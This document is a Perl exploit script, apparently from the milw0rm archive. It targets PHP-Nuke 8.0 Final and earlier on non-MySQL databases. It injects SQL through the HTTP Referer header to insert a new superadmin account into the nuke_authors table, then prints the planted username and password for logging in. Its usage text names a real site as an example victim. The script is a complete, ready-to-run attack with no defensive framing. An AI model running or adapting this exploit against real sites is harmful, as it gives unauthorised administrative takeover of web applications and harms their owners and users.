#!/usr/bin/perl
#0day exploit for PHP-nuke <=8.0 Final
#Sql injection attack in INSERT syntax
#version for every base(PostgreSQL,mssql...) except MySQL base
#Coded by:Maciej `krasza` Kukla[krasza@gmail.com]
#Screenshot:
#0day exploit for PHP-nuke <=8.0 Final
#Sql injection attack in INSERT syntax
#version for every base(PostgreSQL,mssql...) except MySQL base
#Coded by:Maciej `krasza` Kukla[krasza@gmail.com]
#
#[+]I registered new superadmin
#[+]You can login at http://blackshell.pl/~krasza/nuke/html/index.php
#[+]Login:krasza
#[+]Password:krasza
#[+]Exploit successed
use strict;
use warnings;
use LWP;
my $adres=shift or help();
my $ua = LWP::UserAgent->new;
my $zadanie = HTTP::Request->new(GET => $adres);
my ($respone,$referer);
banner();
$referer="http://www.krasza.int.pl');INSERT INTO `nuke_authors` VALUES ('krasza', 'God', 'http://www.krasza.int.pl', 'krasza\@gmail.com', '61af1f6e572d7fe3a72f54a6ac53830e', '0', '1', '";
$zadanie->referer($referer);
$respone=$ua->request($zadanie);
$respone->is_success or die "$adres : ",$respone->message,"\n";
print "[+]I registered new superadmin\n";
print "[+]You can login at $adres \n";
print "[+]Login:krasza\n";
print "[+]Password:krasza\n";
print "[+]Exploit successed\n";
sub banner{
print "0day exploit for PHP-nuke <=8.0 Final\n";
print "Sql injection attack in INSERT syntax\n";
print "version for every base(PostgreSQL,mssql...) except MySQL base\n";
print "Coded by:Maciej `krasza` Kukla[krasza\@gmail.com]\n\n";
}
sub help{
print "0day exploit for PHP-nuke <=8.0 Final\n";
print "Sql injection attack in INSERT syntax\n";
print "version for every base(PostgreSQL,mssql...) except MySQL base\n";
print "Coded by:Maciej `krasza` Kukla[krasza\@gmail.com]\n";
print "Use:\n";
print "\tperl exploit.pl [url]\n";
print "\t[url]-vicitim webpage with index.php\n";
print "Example:\n";
print "\tperl exploit.pl http://phpnuke.org/index.php\n";
exit(0);
}
# milw0rm.com [2007-02-20]